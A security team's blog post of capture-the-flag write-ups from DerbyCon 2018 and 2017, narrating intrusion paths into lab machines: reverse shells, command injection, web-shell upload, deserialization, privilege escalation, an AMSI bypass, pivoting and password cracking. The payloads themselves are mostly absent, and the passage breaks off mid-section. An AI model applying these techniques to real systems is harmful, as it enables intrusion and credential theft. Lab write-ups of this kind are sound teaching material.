Posts

DerbyCon 2018 CTF Write Up

We have just returned from the always amazing DerbyCon 2018 conference. We competed in the 48 hour Capture the Flag competition under our usual team name of “Spicy Weasel” and are pleased to announce that, for the second year in a row, we finished in first place out of 175 teams and netted another black badge.

We’d like to say a big thank you to the organizers of both the conference and the CTF competition, as well as the other competitors who truly kept us on our toes for the entire 48 hours!

As in previous years (2016, 2017), we’ve written up an analysis of a small number of the challenges we faced.

image1.jpeg

image2.jpeg

Susan

This box took us far too long to get an initial foothold on, but once we gained access the rest came tumbling down quite easily. It was only running two services, as detailed below. Our team spent some time on this box with limited success. It was possible to use the mail service to identify users of the system using the VRFY method to identify susan as a user on the system, as well as use the system to send email. Some time was given to the mail service to send email internally with no output.

Extensive brute forcing of the SSH service was carried out by multiple members of the team over the course of the CTF, with no success.

Susan’s password was eventually recovered, although not through the simple and presumably intended method of brute forcing. We’ll be kind to ourselves and say it was potentially due to network stability issues, since the eventually discovered correct pair of credentials were passed to the server during multiple brute force attempts.

We will come back to Susan later in this post…

Elastihax

There were a number of easy to grab flags that could be retrieved from this box by using dirb to identify a few hidden directories. However, the main part of this box was a site running Elasticsearch.

Our team identified a known vulnerability in the version of Elasticsearch API 1.1.1, which allows for remote code execution. The exploit for this is included in the Metasploit framework by default:

The operating system was identified as Ubuntu 9.10, running a version of the Linux kernel vulnerable to a number of kernel level exploits (2.6.31-14).

Our team decided to utilise Dirty COW, an exploit that adds the account firefart with root access.

It was then possible to log into the server using the firefart account:

There were many flags on this box, one of which was the password of the davekennedy account. Unfortunately, this was one that escaped us due to its discovery in the later part of the CTF and the complexity of the underlying password.

Reviewing the box revealed a number of flags, however of greater use was an SSH key inside the home directory of the user susan.

Susan Continued

Using the discovered SSH key for the user susan, it was possible to gain access to the box Susan.

The box was a trove of flags in many locations, as demonstrated above. Other locations included grub.config and authorised key files. One of the more fun flags was saved in the user’s home directory Pictures/Wallpapers/Untitled.png, which was retrieved from the box; VNC was running on localhost and we saw a number of people port forwarding through the box but we just downloaded the file.

X64 binaries

There were a number of x86, x64 and arm binaries of varying difficulties. We captured the flag from most of these and have opted to show a run through of the x64 series.

Simple (File name: x64.simple.binary)

As expected from the file name, this challenge was very simple. It was a Mach-O 64-bit binary, and when executed it asked the user for a key to continue.

C:\Users\jlopes\AppData\Local\Temp\vmware-jlopes\VMwareDnD\297b677f\x64.simple.binary-main.png

We could see that the user’s input was passed to the _AttemptAuthentication() function as an argument. Looking at that function, we could see that its argument was compared (using strcmp) to aolOneBar@Bill.io – the flag for this challenge.

C:\Users\jlopes\AppData\Local\Temp\vmware-jlopes\VMwareDnD\e73333f3\x64.simple.binary-authenticate.png

It is worth noting that there were a significant number of hardcoded red herrings, trying to divert someone who was just looking for strings within the binary.

Medium (File name: x64.medium.binary)

Once again we had a Mach-O 64-bit binary. Similarly to the previous binary, the user was prompted to enter a key when the binary was executed. This time, it looked like things were a bit more complex than a simple strcmp():

Looking a bit deeper into the assembly, it would seem that the users input was compared to a reference string (which looked like a mangled email address) in the following fashion:

  1. Start with the last character of the input string, compare with the first character of the reference string;
  2. Skip backwards 13 characters in the input string, compare with next character of the reference string;
  3. Repeat step 2 until you cannot go further back;
  4. Move the starting point one character back (from last to penultimate), compare with next character of the reference string;
  5. Repeat from step 2, until all 13 possible non-overlapping starting points have been covered.

Knowing that comparison algorithm, one could reverse it until this challenges flag was identified. However, during the pressure of the CTF we opted for a less elegant but quicker and easier way of solving this challenge.

As with the previous challenge, a large number of red herring flags could be found in the file:

It was a reasonable assumption that one of these red herrings would be the valid flag.

With a few lines of Python, we took the list of red herrings, and computed which one(s) could be written using only the characters from the reference string. As it turned out, only one of them matched that condition:

  • microsoftaolmicrosoftaolFredBobNetlive@TED.io

This was the flag for this challenge.

It should be noted that the first character of the user input was not considered when comparing to the reference string. This is why the flag has two m characters, but the reference string contains only one.

Hard (File name: x64.hard.binary)

For the hardest of the x64 binary challenges, we were given two files. One represented a custom filesystem image, and the other was a tool that could read from and write to the given custom filesystem image. This fictional filesystem took the name of DedotatedWamFS. Here’s a screenshot of the tool’s functionality.

Reading the filesystem image we were given, we found a hint in one of the files:

It would seem that the flag was in a file in the filesystem image, but the user remembered to delete it (since it wasn’t in any of the other files in the filesystem).

Disassembling the binary, we started by identifying the tool’s core functionality:

C:\Users\jlopes\AppData\Local\Temp\vmware-jlopes\VMwareDnD\ff3353af\x64.hard.binary-functions.png

Looking at the DELETE sub-routine, we were able to identify that deleted files are marked with a binary flag.

With that in mind, the first thing we needed was the name of the deleted flag file. We looked into the LIST sub-routine, and identified a code section which would only list the file if it had not been deleted, by checking the flag.

We patched that section of the binary, so that the tool wouldn’t check whether the file was deleted or not.

We had found the deleted file – flag.txt. We proceeded to look into the READ sub-routine; once again we identified a simple check to confirm whether the file was deleted or not. We patched that section of the code out and could then read the file.

It looked like the deleted flag.txt file was encoded or encrypted. We went a bit further disassembling the executable, into a sub-routine we identified as WRITE.

It seemed like the file was encoded using a rotating XOR single-byte key. Every byte of the file was XOR’ed with a byte key, which is then incremented by 0x07. The original XOR byte key could not be recovered through reverse engineering alone, because it was based on a random value.

However, since it was a single byte, we could simply brute force the 256 possible values. We wrote a few lines of Python for this. The flag file contents we recovered were:

  • superkai64@minecraft.net

Jenkins

There were two services available: SSH and a web server.

Browsing to the website on port 8080 presented a Jenkins portal that allowed for self-registration.

Jenkins is an open source software written in Java that has a known exploitation path by use of the Script Console. As described on the Jenkins web site: “Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents.” While Jenkins now offers protections to limit access from non-administrators, the installed version did not offer those protections.

We registered for an account, which allowed for access to the “Manage Jenkins” features and the Script Console.

We then used one of the reverse shells belonging to pentestmonkey:

It was possible to gain a reverse shell running in the context of the user Jenkins on this system.

From that shell, it was possible to gain a full TTY session by using the python3 installation on the host. This allowed access to a few of the five flags on this host.

Access to a root shell was gain by breaking out of the less program. Within the sudoers file, the Jenkins user was defined as having the ability to run the less program against the syslog file without requiring a password. Once a root shell was obtained, access to the CTF user’s password was gained from the .bash_history file. This user was defined within the sudoers file as having all root permissions. That account allowed us to access the SSH service bypassing the Jenkins service and gaining the rest of the flags on the host.

osCommerce

We discovered that default installation pages for the osCommerce application were accessible.

This was particularly interesting as publicly available exploits exist, which can be executed by an unauthenticated user, resulting in code execution on the underlying server.

Our actions were fairly limited because we were executing commands in context of the www-data user. As such, the next step was to compile, upload and execute a kernel-based privilege escalation exploit (CVE-2016-4557) for more meaningful access.

Executing the exploit provided us with a root shell, and the ability to read files without restriction.

After scooping up most of the file-based flags, the next step was to compromise the MySQL database of the application. We found credentials for the debian-sys-maint user and used these to log into the MySQL database.

Displaying the contents of the administrators table provided us with access to the final flag on osCommerce.

Quiz System

Based on the directory structure, file names and application name, we were relatively confident that the source code of Quiz System was publicly available at this link:

After downloading the application, we began to search for SQL injection vulnerabilities which would result in access to the underlying system.

The /admin/ajx-addcategory.php file had a parameter called catname which was vulnerable to SQL injection attacks.

We created the following requests file and fed this into sqlmap. This resulted in code execution on the underlying server in the context of the www-data user.

Sqlmap creates an upload file when the --os-shell flag is used. This was particularity useful as it allowed us to upload a PHP payload which provided us with a shell on the underlying system.

After inspecting the /etc/passwd file, we identified that there were two users of interest, quiz and root. Both users shared the same password, which we fortuitously guessed to obtain root access and access all file-based flags.

WordPress

Facepalm update: The DerbyCon CTF team got in touch with us and let us know that while the attack path described here is valid, it was not the intended path.  Apparently there was a WordPress username – djohnston- embedded in the HTML comments somewhere, and that user has a password of Password1 for wp-admin.  Certain members of our team maintain they attempted this with no success but… *cough* 🙂

This challenged included a WordPress based blog – the EquiHax Blog.

There was an XXE flaw which allowed us to view the contents of server-status because it was available to localhost.  Through that, we found a file named dir.txt which was accessible under the wp-admin directory. This file provided a listing of all files in this directory.

Interestingly, the 050416_backup.php file was originally intended to be named pingtest.php.

The purpose of this file was to feed an IP or domain argument, via the host parameter, into /bin/ping. As this file executed system commands, we are able to add a semi-colon to end the ping command and issue commands of our choice. Consequently, we spun up a temporary web server and hosted a password-protected web shell. This was then downloaded to the WordPress server by using wget.

Having a web shell allowed us to execute further commands, as well as upload and download files. We leveraged the existing python3 interpreter on the WordPress box to obtain a reverse TCP shell in context of the www-data user. After inspecting the groups for this user, we identified that www-data was part of the sudo groups, which enabled us to easily escalate our privileges to root.

After scooping up most of the file-based flags, the next step was to compromise the applications MySQL database. Credentials for accessing the database were located in the wp-config.php file. Displaying the contents of the administrators table provided us with access to the final flag on WordPress.

Equihax Chat Server

This server hosted two applications: a dd-wrt firewall on port 80 and a custom chat application on port 443. The information presented by the dd-wrt firewall implied that this host bridged the two networks in scope together.

It also had an RDP service available, even though the dd-wrt application implied it was a Linux box.

It was our assumption that the HTTPS and RDP ports were being reversed proxied from host(s) within the second network, but we ran out of time and could not confirm this.

Returning to the custom application, we had the option of logging in using either IdentETC or IdentLDAP. This seemed like a bit of a hint that the application was able to use the credentials from an enterprise authentication system. It might be connected to something bigger.

We guessed the weak credentials and were able to log in (chat/chat) with the IdentETC method.

Once logged in, we found a simple chat interface where you could post a message and subscribe/unsubscribe from the Public channel.

We then identified an interesting looking session cookie. When you first entered your credentials using the IdentETC method, these are POSTed to the /Login page. This set a cookie called session and then a redirect to /Chat was triggered. By examining the session cookie, we could see that it was made up of a number of parts, all delimited by a colon.

We decoded the session cookies value and obtained the following output.

That was interesting; even though we were using the IdentETC method of authentication, it was actually using the IdentLDAP method behind the scenes to log us in.

Remember the RDP that was open? Well, guess which credentials worked on that!

It quickly became apparent that we were not the only people with these credentials as we were being kicked out from our RDP session on a very regular basis. To ensure we maintained access, we dropped C2 and started to enumerate the machine and the domain.

We noticed that the one of the other users to have logged into the device was scott; it turned out that account was part of the domain admins group.

Further investigation also confirmed that this device was located on a network segment inaccessible from the rest of the network (192.168.252.0/24 instead of 192.168.253.0/24).

It was then possible to use our access to this machine to begin to explore the “internal” network range and to begin attacking the domain. After a while (actually a disappointingly long time) we discovered that scott was using his username as a password.

We could then use scott’s credentials and the foothold we’d gained on the chat server to pivot to the domain controller and start hunting for flags. One of the things we did was dump the hashes pulled from the domain controller and feed them into our hash cracking machine.

Within in a few minutes we had retrieved 1,372 passwords. We picked one of the passwords at random and submitted it; 2 points.

We therefore likely had a load of low value flags that needed to be submitted, but being the lazy hackers we are, no one was really in the mood to submit 1,372 flags manually; automation to the rescue! We quickly put together a Python script to submit the flags on our behalf, and got back to hacking while the points slowly trickled in.

Chat Server Continued…

What was completely conspicuous by its absence was any form of integrity checking on the session cookie (this should have been implemented through the use of MAC, utilising some form of strong sever side secret).

We could see that the cookie was the serialized form of a binary object. When the cookie was sent to the server, it was likely deserialized back into a graph of binary objects. The serialized form defines the objects to be instantiated and the values to be copied into them. You can’t send the declaration of an object; only its data. This doesn’t mean it isn’t possible to build a graph that will execute code, though.

A fantastic example of this is Gabriel Lawrence and Chris Frohoff’s ysoserial tool for Java. To understand this concept further, we can’t recommend their talk “Marshalling Pickle’s” enough:

Ruby on Rails has gadgets for RCE via derserialization via the ActiveSupport, which we tried, but unfortunately this was not a Rails application. Then…

It didn’t appear to be a User object, though.

Well, it just happened to be assigned in a different location. Once you had logged in the redirect to /Chat caused a second part of the cookie to be set.

As we can see here, and comparing to the previous session cookie screenshot, the section of the session cookie before the first delimiter had dramatically increased.

The serialized object now contained a Userid and indentToken. Doing some research, we found that these classes are part of the SHIPS (https://github.com/trustedsec/SHIPS) toolkit that TrustedSec has put on GitHub.

One of the gems inside this project is called usa. It contains the definition for IdentLDAP and IndentETC, along with a very interesting definition called IdentETCNoPass. Despite a bit of time spent on authenticating with that object, no shell was forthcoming – time for a break.

The break involved learning as much as possible about Ruby, looking at some of the other challenges and watching the Offspring, who were awesome.

Coming back to this and thinking about the clue earlier, it was time to try and mock a Ruby object, serialize it and see what happened. To do this we needed a Ruby environment and for this we used https://repl.it – essentially an online code test environment.

With Ruby serialization, only the name of the object has to match during deserialization; any matching members will be populated with the values passed through. Here we were able to mock the User object completely, then serialize it and encode it in Base64. The payload in both the indentType and identToken here was a string that should execute the ping command:

https://stackoverflow.com/questions/6338908/ruby-difference-between-exec-system-and-x-or-backticks

Here is the serialized and encoded form.

And here are the pings coming back after the sending the cookie in:

So where is the flag? Well, unfortunately we only worked this out with 15 minutes of the CTF to go, so despite gaining code execution the flag eluded us. Ah well, it was still a really cool challenge that we had some epic learning from.

OTRS

Having used the Equihax Chat Server to compromise the domain controller and pivot into the internal network, we were faced with some new machines. This was one of them.

In order to find OTRS, we ran various reconnaissance tools post foothold against the internal network of equihax.com. The first was an ARP scan of the network, as shown below. This identified two additional hosts, 192.168.252.10 & 192.168.252.106:

192.168.252.10 was on the inside of the dd-wrt host, which was later revealed not to be exploitable.

After we compromised both Windows hosts within the internal network, we performed a portscan to find out if any additional ports were open from the domain controller. However, it appeared that all ports were available to both hosts on the network.

It was noted that the more stable host was the DC and as such we deployed a SOCKS proxy server from the domain controller (192.168.252.2). The SOCKS proxy allowed us to build a tunnel through the compromised host and funnel all traffic through to the target environment from our own hosts. This feature allowed us to access a number of resources, including connecting remote desktop (RDP) sessions and internal web sites such as OTRS.

The following screenshot shows the homepage of the OTRS software which was identified using lateral movement techniques from the internal domain controller.

After some additional external reconnaissance, it was identified that this software was used as an aid to helpdesk staff for raising tickets internally. By clicking the link shown below, it moved to a login prompt which was found to have easily guessable credentials of helpdesk/helpdesk.

Once connected to the OTRS software as a standard user, the following ticket information was available.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\24ce608a\FreeRDP^% 192.168.252.2_008.png

After looking inside the tickets, the following hint was given:

“Hey Jim I am still working on getting this helpdesk app setup since management insists we actually have to take care of the darn users now.

I know the password I set was Swordfish but I can’t remember what the administrator account name was. Anyway now that this thing is stood up we might as well use it”

Swordfish was both the password for an administrator level account on this software as well as a flag. We had to identify the default account for this host and found this by doing some research on the Internet. This was root@localhost.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\b3c48de5\Tooltip_006.png

We discovered from conducting research against this software (OTRS 6.0.1) that two publicly disclosed vulnerabilities exist in it. One is abusing the packet manager and uploading a new packet which is vulnerable to code execution, and the other abuses the PGP keys which can also achieve code execution.

Only one of the two appeared to work in this environment (CVE-2017-16921) which affected the PGP keys deployment. More information on these vulnerabilities can be found here:

The essence of the vulnerability was editing the PGP::Bin file and parameters to execute some other binary; in this example we used a simple Python reverse TCP connection.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\673abbfb\FreeRDP^% 192.168.252.2_015.png

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\e63b38fb\FreeRDP^% 192.168.252.2_016.png

The payload used was:

Once we had a foothold on the host, we identified it was running as the apache user and privilege escalation was required. The usual escalation techniques were attempted and a SetUID binary that seemed out of place was identified.

Using the foothold, we executed the following commands to extract the hashes:

The -O flag writes the contents of the archive to the screen.  However, this didn’t obtain a flag, or at least not until we were able to crack the root password which we didn’t complete before the end of the CTF. In doing this it did reveal that the user’s password for OTRS was OTRS.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\2ac6263c\Selection_017.png

To obtain a full root shell to access the flag we could have either guessed the location, tar’d the entire root folder, or replaced the /etc/shadow & /etc/passwd file to create a new UID 0 user.  We got root access and used PoshC2 for handling our shells, including on this box, as shown below.

There may have been other flags on this host but we ran out of time to find them.

Web Credit Report Dispute Application

This server hosted a custom credit report dispute application. As a pre-authenticated user we were able to create a dispute, but in order to find more of the functionality, we needed to be able to login.

Clicking on the “Create a report” link, we were taken to the “Problem Report form”. As this page was pre-authentication and there was an authenticated section to the application, we immediately started thinking this might be some kind of stored XSS or SQLi. We spent a bit of time fuzzing, which ultimately showed this not to be the case.

Okay then, let’ try and log in.

After a bit of fuzzing on the login form, it turned out that you could log in using the username:password combination of Admin:. Interesting; it looked like there was some kind of injection vulnerability on the password field. We decided we’d roll with it for the moment and see if it anything more could be done with it later.

Once we were authenticated, we got to the /viewreports.php page shown below. It contained all of the reports that had been created. Thanks to fellow CTFers’ prodigious use of Burp Suite Active Scan, there were quite a few reports listed. It was also difficult to understand when one was created – something we later found a solution to.

Clicking on any of the links here took you to the /viewreport.php page again, this time detailing all the information that the relevant user had submitted.

Locating a report that we had just created was a little on hard side; the actual report created looked like it contained some kind of timestamp. Unfortunately, no ID was returned when you created a report either. The solution is documented a little further down.

The rpt field was found to have a path traversal vulnerability, but by far the most interesting part of the page was the “I have fixed this!” link. Viewing the source of the page and decoding the URL using the Burp shortcut ctrl+shift+u, we could see that the rename.php page took two parameters, old & new, which just happened to take file paths as values.

Our immediate thought was to inject PHP via the create report page, locate it on the view requests page, move it so it had a PHP extension, navigate to it and BOOM code execution.

If only it was that simple; it was indeed possible to change the file extension to PHP, PHP5 and PHPS, however all the fields in the Report Creation page were being escaped on output, exactly as can be seen here with the first name field:

Okay, so how was it possible to easily spot the page that had just been created?

Well, no Spicy Weasel write-up is complete without the use of LinqPad, our favourite C# scratchpad tool (https://linqpad.net). For those interested in beginning .NET development, this is an excellent tool to experiment with.

The idea was to write a script that would retrieve the listing of the viewreport.php page, persist the current entries and then on every subsequent run check for any new pages. To persist between runs, a static class with static container members was created. LinqPad can use a new process per run of the script which would destroy our static container. To ensure that the results were persisted between runs, the following settings were created (performed by right clicking the query and selecting properties).

Who said you can’t parse HTML with a regex? 🙂

Checking out the server header, we could see that somewhat unusually for a PHP application, it was hosted on Windows. This suddenly made the rename.php file a lot more interesting.

What if the page can read and write to UNC paths..?

So yes, it turns out UNC paths could be read. The problem, though, was that IIS was running with no network credentials, and modern SMB is designed to make it as difficult as possible to allow connections by hosts with no credentials.

By deliberately weakening the SMB configuration on a virtual machine, it was possible to successfully have a file read by sending the request in the screenshot above. This allowed the uploading of a PHP file that kicked off a PowerShell Posh C2 (https://github.com/nettitude/PoshC2) one liner, giving us a shell to go searching for the flags.

Once we identified that vulnerability in the application, we hosted a PHP file which executed PowerShell on the remote host using PoshC2.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\a3c6bd82\Selection_002.png

Once we had C2 on this host, we discovered it was running as the IUSR, which is a low level IIS application user. We attempted various standard privilege escalation checks against the host and concluded it was a Server 2016 box with no trivial escalation vulnerabilities other than no patches applied. Eternal Blue (MS17-010) could have been an option but this is normally unstable for Server 2016 and was probably not the intended exploit for this host.

After further enumeration of the host we identified two more flags on the system using the command below:

This yielded:

  • info.php:2:header(‘Flag: TheBruteForceIsStrongInThisOne’);
  • viewreports.php:19:header(‘Flag: InjectionHeaders’);

We also found a file inside the adminscripts folder that had a hint inside suggesting that this was a scheduled task that ran every five minutes. We added an additional line to execute our PowerShell payload:

This allowed us to obtain administrator level privileges on the host with PoshC2, as shown below. We then extracted the hashes of all users and cracked the password for the administrator user, which was a large flag, as well as one from the administrators’ desktop.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\f6b90190\Selection_007.png

It should be noted that all Windows 2016 hosts had Windows Defender enabled, which was blocking malicious PowerShell.

As such we needed to migrate to inject the PoshC2 shellcode, which employs the AMSI bypass released by @mattifestation:

Equihax License Validator (fu3) – Keygen Project

The Equihax licensing server had one objective – download the application and try to reverse engineer the .NET application to create a keygen to submit back to the original site for verification.

We first identified it was a .NET assembly by running the file command on Linux.

We used iLSpy to decompile the binary, but it generated the following error when trying to decompile validateLicense function.

Z:\Desktop\il1.png

We then downloaded the latest version of iLSpy (4.0.0.4319-beta2) which successfully decompiled the code back to C#.

Z:\Desktop\il2.png

The first section of the code took the users first name and MD5 hashed that value. It then took the first eight characters of that substring and used it in the next part of the code. It also had a static string that it used as part of the keygen creation ( Kc5775cK).

By using the algorithm in the above code, we could simply create our own StringBuilder string and spit it out using LINQPad. There was also some unnecessary code below this, but we didn’t need that to generate the license. Here’s the code for this project and the generated license key.

The full source code is as follows.

This yielded the flag.

MUD

There was a downright evil box that hosted a MUD, courtesy of @Evil_Mog. With the exception of a couple of simple flags, we were unable to gain any traction here. This tweet says it all…

Conclusion

This year’s DerbyCon was as fun as ever, and we really enjoyed participating in the CTF competition. Hopefully you can find some value in us sharing portions of the competition with you.

We’re always grateful for the opportunity to practise our craft and we recognise the sheer effort required to put on an event like DerbyCon, including the annual DerbyCon CTF. Once we’ve rested up, we’ll be looking forward to next year!

DerbyCon 2017 CTF Write Up

The excellent Derbycon 2017 has just come to an end and, just like last year, we competed in the Capture The Flag competition, which ran for 48 hours from noon Friday to Sunday. As always, our team name was SpicyWeasel. We are pleased to say that we finished in first place, which netted us a black badge.

We thought that, just like last year, we’d write up a few of the challenges we faced for those who are interested. A big thank you to the DerbyCon organizers, who clearly put in a lot of effort in to delivering a top quality and most welcoming conference.

Edit: We have just released the DerbyCon 2018 CTF Write Up

https://scontent-lga3-1.xx.fbcdn.net/v/t34.0-12/22016576_10159281578705621_359956649_n.jpg?oh=9d6de859e618e70b6eb96036eef257a5&oe=59CD0A41

Facespace

Navigating to this box, we found a new social media application that calls itself “The premiere social media network, for tinfoil hat wearing types”. We saw see that it was possible to create an account and login. Further, on the left hand side of the page it was possible to view profiles for those who had already created an account.

Once we had created an account and logged in, we were redirected to the page shown below. Interestingly it allowed you to upload tar.gz files, and tar files have some interesting properties… By playing around with the site, we confirmed tar files that were uploaded were indeed untar’d and the files written out to the /users/ path.

One of the more interesting properties of tar is that, by default, it doesn’t follow symlinks. Rather, it will add the symlink to the archive. In order to archive the file and not the symlink, you can use the --h or --dereference flag, as shown below.

Symlinks can point to both files and directories, so to test if the page was vulnerable we created the following archive pointing to:

  • the /root dir
  • /etc
  • the known_hosts file in /root/.ssh (on the off chance…)

The upload was successful and the tar was extracted.

Now to find out if anything was actually accessible. By navigating to /users/zzz/root/etc/passwd we were able to view the passwd file.

Awesome – we had access. We stuck the hash for rcvryusr straight into hashcat and it wasn’t long before the password of backup was returned and we were able to login to the box via SSH.

We then spent a large amount of time attempting privilege escalation on this Slackware 14.2 host. The organisers let us know, after the CTF had finished, that there was no privilege escalation. We thought that we would share this with you, so that you can put your mind at rest if you did the same!

JitBit

Before we proceed with this portion of the write up, we wanted to note that this challenge was a 0day discovered by Rob Simon (@_Kc57) – props to him! After the CTF finished, we confirmed that there had been attempted coordinated disclosure in the preceding months. The vendor had been contacted and failed to provide a patch after a reasonable period had elapsed. Rob has now disclosed the vulnerability publicly and this sequence of events matches Nettitude’s disclosure policy. With that said…

We hadn’t really looked too much at this box until the tweet below came out. A good tip for the DerbyCon CTF (and others) is to make sure that you have alerts on for the appropriate Twitter account or whatever other form of communication the organizers may decide to use.

Awesome – we have a 0day to go after. Upon browsing to the .299 website, we were redirected to the /KB page. We had useful information in terms of vendor and a version number, as highlighted below.

One of the first things to try after obtaining a vendor and version number is to attempt to locate the source code, along with any release notes. As this was a 0day there wouldn’t be any release notes pointing to this issue. The source code wasn’t available, however it was possible to download a trial version.

We downloaded the zip file and extracted it. Happy days – we find it’s a .NET application. Anything .NET we find immediately has a date with a decompiler. The one we used for this was dotPeek from https://JetBrains.com. There are a number of different decompilers for .NET (dnSpy being a favourite of a lot of people we know) and we recommend you experiment with them all to find one that suits you.

By loading the main HelpDesk.dll into dotPeek, we are able to extract all the source from the .dll by right clicking and hitting export to Project. This drops all the source code that is able to be extracted into a folder of your choosing.

Once the source was exported we quickly ran through it through Visual Code Grepper (https://github.com/nccgroup/VCG) which:

“has a few features that should hopefully make it useful to anyone conducting code security reviews, particularly where time is at a premium“

Time was definitely at a premium here, so in the source code went.

A few issues were reported, but upon examining them further, they are all found to be false positives. The LoadXML was particularly interesting as although XMLDocument is vulnerable to XXE injection in all but the most recent versions of .NET, the vendor had correctly nulled the XMLResolver, mitigating the attack.

A further in depth review of the source found no real leads.

The next step was to look through all the other files that came with the application. Yes we agree that the first file we should have read was the readme but it had been a late night!

Anyway, the readme. There were some very interesting entries within the table of contents. Let’s have a further look at the AutoLogin feature.

The text implies that by creating an MD5 hash of the username + email + shared-secret, it may be possible to login as that user. That’s cool, but what is the shared secret?

Then, the tweet below landed. Interesting.

We tried signing up for an account by submitting an issue, but nothing arrived. Then, later on another tweet arrived. Maybe there was something going on here.

So, by creating an account and then triggering a Forgotten Password for that account, we received this email.

Interesting – this is the Autologin feature. We really needed to look into how that hash was created.

At this point we began looking into the how the URL was generated and located the function GetAutoLoginUrl() which was within the HelpDesk.BusinessLayer.VariousUtils class. The source of this is shown below.

As stated in the readme, this is how the AutoLogin hash was generated; by appending the username, email address and this case the month and day. The key here was really going to be that SharedSecret. We were really starting to wonder at this point, since the only way to obtain that hash was via email.

The next step was to try and understand how everything worked. At this point we started Rubber Ducky Debugging (https://en.wikipedia.org/wiki/Rubber_duck_debugging). We also installed the software locally.

Looking in our local version, we noticed that you can’t change the shared secret in the trial. Was it is same between versions?

One of the previous tweets started to make sense too.

The KB article leaked the username and email address of the admin user. Interesting, although it was possible to obtain the email address from the sender and, well, the username was admin…

We tried to build an AutoLoginUrl using the shared secret from our local server with no joy. Okay. Time to properly look at how that secret was generated.

Digging around, we eventually found that the AutoLoginSharedSecret was initialised using the following code.

This was looking promising. While the length of the shared secret this code generated was long enough, it also made some critical errors that allowed the secret to be recoverable.

The first mistake was to completely narrow the key space; uppercase A-Z and 2-9 is not good enough.

The second mistake was with the use of the Random class:

This is not random in the way the vendor wanted it to be. As the documentation states below, by providing the same seed will mean the same sequence. The seed is a 32bit signed integer meaning that there will only ever be 2,147,483,647 combinations.

In order to recover the key, the following C# was written in (you guessed it!) LinqPad (https://www.linqpad.net/).

The code starts with a counter of 0 and then seeds the Random class generating every possible secret. Each of this secrets is then hashed with the username, email, day and month to see if it matches a hash recovered from the forgotten password email.

Once the code was completed it was run and – boom – the secret was recovered. We should add that there was only about 20 mins to go in the CTF at this stage. You could say there was a mild tension in the air.

This was then used to generate a hash and autologin link for the admin user. We were in!

The flag was found within the assets section. We submitted the flag and the 8000 points were ours (along with another challenge coin and solidified first place).

We could finally chill for the last 5 mins and the CTF was ours. A bourbon ale may have been drunk afterwards!

Turtles

While browsing the web root directory (directory listings enabled) on the 172.30.1.231 web server, we came across a file called jacked.html. When rendered in the browser, that page references an image called turtles.png, but that didn’t show when viewing the page. There was a bit of a clue in the page’s title “I Like Turtles”… we guess somebody loves shells!

When viewing the client side source of the page, we saw that there was a data-uri for the turtle.png image tag, but it looked suspiciously short.

Using our favourite Swiss army tool of choice, LinqPad (https://www.linqpad.net/ – we promise we don’t work for them!), to Base64 decode the data-uri string, we saw that this was clearly an escape sequence. Decoding further into ASCII, we had a big clue – that looks a lot like shellcode in there.

The escape sequence definitely had the look of x86 about it, so back to LinqPad we go in order to run it. We have a basic shellcode runner that we sometimes need. Essentially, it opens notepad (or any other application of your choosing) as a process and then proceeds to alloc memory in that process. The shellcode is then written into that allocation and then a thread is kicked off, pointing to the top of the shellcode. The script is written with a break in it so that after notepad is launched you have time to attach a debugger. The last two bytes are CD 80 which translates to Int 80 (the System Call handler interrupt in Linux and a far superior rapper than Busta).

Attaching to the process with WinDbg and hitting go in LinqPad, the int 80 was triggered, which fired an Access Violation within WinDbg. This exception was then caught, allowing us to examine memory.

Once running WinDbg we immediately spotted a problem, int 80h but the Linux system call handler. This was obviously designed to be run under a different OS.  Oops.  Oh well, let’s see what we can salvage.

One point that is important to note is that when making a system call in Linux, values are passed through from user land to the kernel via registers. EAX contains the system call number then EBX, ECX, EDX, ESX and EDI take the parameters to the call in that order. The shellcode translates as follows. XORing a register with itself is used as a quick way to zero out a register.

What we saw here was that the immediate value 4 is being moved into the first byte of the EAX register (which is known as AL). This translates to the system call syswrite which effectively has the following prototype.

Based upon the order of registers above, this prototype and the assembly we see that EBX contains a value of 1 which is std out, ECX contains the stack pointer which is where the flag is located and EDX has a value of 12h (or 18) which corresponds to the length of the string.

So yes, had this been run on a Linux OS we would have had the flag nicely written to the console rather than an access violation, but all is not lost. We knew the stack contained the flag, so all we needed to do was examine what was stored within ESP register (Stack Pointer). In WinDbg you can dump memory in different formats using d and then the format indicated using a second letter. For example in the screenshot below, the first command in the screenshot is dd esp, which will dump memory in DWORD or 4 byte format (by default 32 of them returning 128 bytes of memory). The second command shown is da esp which starts dumping memory in ASCII format until it hits a null character or has read 48 bytes.

iLibrarian

When browsing to the 172.30.1.236 web server, we found the iLibrarian application hosted within a directory of the same name. The first two notable points about this site were that we had both a list of usernames in a drop down menu (very curious functionality) and, at the bottom of the page, was a version number. There was also the ability to create a user account.

When testing an off the shelf application the first few steps we perform are to attempt to locate default credentials, the version number and then obtain the source/binaries if possible. The goal here is an attempt to make the test as white box as possible.

A good source of information about recent changes to a project is the issues tab on GitHub. Sometimes, security issues will be listed. As shown below, on the iLibrarian GitHub site one of the first issues listed was “RTF Scan Broken”. Interesting title; let’s dig a little further.

There was a conversion to RTF error, apparently, although very little information was given about the bug.

We looked at the diff of the change. The following line looked interesting.

The next step was to check out the history of changes to the file.

The first change listed was for a mistyped variable bug, which didn’t look like a security issue. The second change looked promising, though.

The escaping of shell arguments is performed to ensure that a user cannot supply data such that it breaks out of the system command and starts performing the user’s action against the OS. The usual methods of breaking out including back ticks, line breaks, semi colons, apostrophes etc. This type of flaw is well known and is referred to as command injection. In PHP, the language used to write iLibrarian, the mitigation is usually to wrap any user supplied data in a call to escapeshellarg().

Looking at the diff of changes for the “escape shell arguments” change we can see that this change was to call escapeshellargs() on two parameters that are passed to the exec() function (http://php.net/manual/en/function.exec.php).

Viewing the version before this change, we saw the following key lines.

Firstly a variable called $temp_file is created. This is set to the current temporary path plus the value of the filename that passed during the upload of the manuscript file (manuscript is the name of the form variable). The file extension is then obtained from the $temp_file variable and if it is either doc, docx or odt, the file is then converted.

